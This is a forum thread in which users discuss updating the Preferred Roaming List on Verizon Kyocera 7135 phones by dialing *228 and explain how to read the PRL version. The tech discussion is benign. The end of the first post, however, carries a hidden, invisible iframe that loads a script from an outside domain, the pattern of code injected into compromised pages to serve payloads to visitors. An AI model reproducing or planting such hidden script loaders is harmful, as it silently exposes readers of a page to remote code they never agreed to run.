What PRL do you have?

I usually do the *228, option #2 (PRL update) once per month at the beginning of the month. Well, I didn't get around to it this month until just a few minutes ago. I had PRL 50095. Just did the update, and now I have PRL 50109 according to the "Software" section of the "Phone Info" program. Anyone know if that's correct? What exactly are the differences between the different numbers??<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Preferred Roaming List.

Thanks for the update (slight play on words). I'm running it now.

I'll resist the temptation to say, "1".

The PRL is the list of cell stations that are considered "home" for your cell phone. By updating the list, you change (almost invariably increase but that does not have to be strictly the case) the locations or number of places where you will not be charged roaming fees. I think Verizon recommends that you update your list (dial *228, option 2) every four weeks or so.

Yeah, I usually try to run the update once per month. Is there anyplace on the web I can go to see my home area as it is now? I mainly want to see if my coverage area has increased in the direction that I want it to go?

A colleague of mine and I work in the same office building and both have 7135's, both activated with Verizon. We both updated our PRL today (Friday, Oct 10) within two minutes of one another. I came away with 50109 and he got 50110. Now why is that???

I ran the same *228, option 2.... all I got was some lousy music, and and indication that the activation was complete. Not that it makes a difference to me, but where did you get that ID number?

Go to the phone side (as if you were about to make a phone call). Dial 111111 (that is 6 number 1's), then, using the rocker panel (with the OK) button, hit the down button until you see "options on the screen. Highlight options and hit the ok button. Then highlight version and hit ok. Scroll down (again using the down rocker button) until you see PRL and it will show you the version PRL you are running.

From the palm side go to the phone folder and hit the "Phone info" icon, in the upper right hand pull down menu select software and it list the phone software, pda software and prl. This way is less "techie"
